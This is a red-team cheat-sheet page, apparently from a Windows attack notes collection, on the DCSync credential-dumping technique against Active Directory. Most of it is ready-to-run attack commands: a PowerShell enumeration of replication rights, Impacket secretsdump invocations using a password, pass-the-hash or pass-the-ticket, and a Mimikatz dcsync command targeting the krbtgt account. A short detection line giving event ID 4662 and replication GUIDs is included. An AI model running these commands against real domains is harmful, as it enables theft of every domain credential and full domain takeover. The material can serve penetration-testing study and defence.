DCSync

MITRE ATT&CK T1003.006

Dump Password Hashes from Domain Controller
It is a credential dumping techniques, adversary to simulate the replication process of a Domain Controllers to ask other DC to replicate information using the MS-DRSR. It cannot disabled as MS-DRSR is a necessary servers of a AD. 
This attack requires domain admin privileges (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have this privileges by default.  
Enumeration
Get-ObjectAcl -DistinguishedName "dc=dc1,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'ds-replication-get-changes') 
Impacket: secretsdump 
# using a plaintext password
secretsdump.py -outputfile 'file.name' 'User'/'domain':'PASSWORD'@'Domain Controller IP'
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
​
# with Pass-the-Hash
secretsdump.py -outputfile 'file.name' -hashes 'LMhash':'NThash' 'User'/'domain'@'Domain Controller IP'
​
# with Pass-the-Ticket
secretsdump.py -k -outputfile 'file.name' 'User'/'domain'@'Domain Controller IP'
​
Example
ZeroLogon Exploit
[email protected]
Secrets Dump
Sauna 10.10.10.175
[email protected]
Pass-the-Hash Attack
Mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dc01\krbtgt"'
Detection
Monitor Windows Event Log 4662 to detect the String: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 or 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 or 89e95b76-444d-4c62-991a-0facbeda640c

Red Team (Windows) - Previous

04 AD Attacks

Next - Red Team (Windows)

05 Bypass-Evasion

Last modified 3mo ago